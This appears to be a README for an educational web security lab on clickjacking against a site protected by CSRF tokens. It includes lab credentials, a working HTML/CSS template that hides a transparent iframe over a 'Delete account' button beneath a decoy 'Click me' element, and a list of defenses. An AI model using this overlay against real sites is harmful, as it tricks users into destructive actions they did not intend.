This repository contains the project files and documentation for analyzing and exploiting basic clickjacking techniques with CSRF (Cross-Site Request Forgery) token protection. The project demonstrates how to exploit clickjacking vulnerabilities and explores methods to defend against them.
The task is to craft an HTML exploit to manipulate a user's interaction on a decoy website, tricking them into deleting their account on a vulnerable site. The goal is to bypass CSRF token protection using a transparent iframe overlay positioned over the target button.
- Understand clickjacking techniques:
- Learn how iframe overlays can be maliciously used.
- Analyze CSRF token protection mechanisms:
- Study vulnerabilities in token-based protections.
- Craft an HTML exploit:
- Develop an iframe-based attack to bypass user awareness.
- Demonstrate exploit delivery:
- Test the crafted exploit in a controlled environment to achieve account deletion.
- Use the provided credentials:
- Username: wiener
- Password: Peter
- Access the "Delete account" section of the target website.
- Use the following HTML template to craft the exploit:
<style> iframe { position: relative; width: 1000px; height: 700px; opacity: 0.000001; z-index: 2; } div { position: absolute; top: 515px; left: 60px; z-index: 1; } </style> <div>Click me</div> <iframe src="YOUR-LAB-ID"></iframe>
-
Understanding iframe manipulation for clickjacking attacks.
- The role of CSRF tokens in securing user actions.
- Practical application of HTML and CSS in crafting exploits.
-
Defense Mechanisms:
- Use of X-Frame-Options headers to prevent embedding in iframes.
- Implementing Content Security Policies (CSP) to restrict iframe behavior.
- Robust validation of CSRF tokens to enhance security.
This repository is strictly for educational purposes. It is intended to provide insights into web security vulnerabilities and methods to mitigate such risks. Any misuse of the content for unauthorized purposes is strictly prohibited.